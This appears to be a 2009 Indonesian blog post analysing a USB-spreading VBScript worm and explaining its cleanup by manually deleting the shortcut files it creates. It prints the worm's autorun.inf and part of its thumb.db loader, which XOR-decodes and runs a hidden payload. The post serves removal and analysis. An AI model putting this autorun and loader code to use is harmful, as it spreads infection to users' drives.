Friday, February 27, 2009
Virus ini akan membuat Autorun.inf di setiap drive dan membuat 5(lima) shotcut, jika di dalam sub folder itu lebih dari 5 (lima) folder dan jika sub foldernya kurang dari 5(lima) maka akan di buatkan sesuai dengan jumlahnya dan menambahkan 2(dua) shortcut lainnya yaitu "Microsoft" dan "New Harry Potter and..." tanpa tanda kutip jadi kalo jumlah foldernya lebih dari 4 (empat) maka total shortcut yaitu 7 (tujuh) shortcut ini disamarkan dengan icon yang sama dengan folder.
file shortcut berisi target ke C:\WINDOWS\system32\wscript.exe //e:VBScript thumb.db "New Harry Potter and..."
Virus ini tidak terdeteksi oleh AntiVir personal
sedangkan oleh PC Media Valkyrie Beta virus ini terdeteksi dengan bisa dibersihkan(file autorun.inf dan thumb.db).
Tetapi file shortcut yang telah di buat oleh virus ini tidak dapat di bersihkan oleh PCMav, maka dilakukanlah cara manual yaitu dengan pencarian "*.lnk" pada semua drive lalu di hapus.
Download PC Media Valkyrie Beta di sini
sedangkan oleh PC Media Valkyrie Beta virus ini terdeteksi dengan bisa dibersihkan(file autorun.inf dan thumb.db).
Tetapi file shortcut yang telah di buat oleh virus ini tidak dapat di bersihkan oleh PCMav, maka dilakukanlah cara manual yaitu dengan pencarian "*.lnk" pada semua drive lalu di hapus.
Download PC Media Valkyrie Beta di sini
Beberapa tampilan komputer yang terkena virus ini
Tampilan di menu tab startup MSCONFIG
isi dari autorun.inf
[autorun]
open=WScript.exe //e:VBScript thumb.db auto
shell\open=Open
shell\open\Command=WScript.exe //e:VBScript thumb.db auto
shell\open\Default=1
shell\explore=Explore
shell\explore\Command=WScript.exe //e:VBScript thumb.db auto
sebagian isi dari Thumb.db
'www.muslimah.or.id;==================================== my name:Yuyun 1.0
' ============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
If status="auto" Then
sh.Explore Left(WScript.ScriptFullName,3)
Else
status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)
-Len(WScript.ScriptName))+status
If fso.FolderExists(status) Then
sh.Explore status
Else
fso.CreateFolder status
sh.Explore status
End If
End If
Else
End If
Set QQ=fso.GetFile(Q)
Set Q1=QQ.OpenAsTextStream(1,0)
isiQ=Q1.Read(QQ.Size)
Q1.close
t1=InStr(1,isiQ,"Yuyun^_^~!~2008"+" >>>",0)+18
isiQ=Right(isiQ,Len(isiQ)-t1)
hsl=""
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
Set temporary=fso.OpenTextFile(tmpt,2,True,0)
temporary.Write hsl
temporary.Close
ws.Run "WScript.exe //e:VBScript "+tmpt+" """+Q+""""
' Yuyun^_^~!~2008 >>> :::::::::::::::::::::::::::::::::::::::::::::::::::::::
0 Comments:
Post a Comment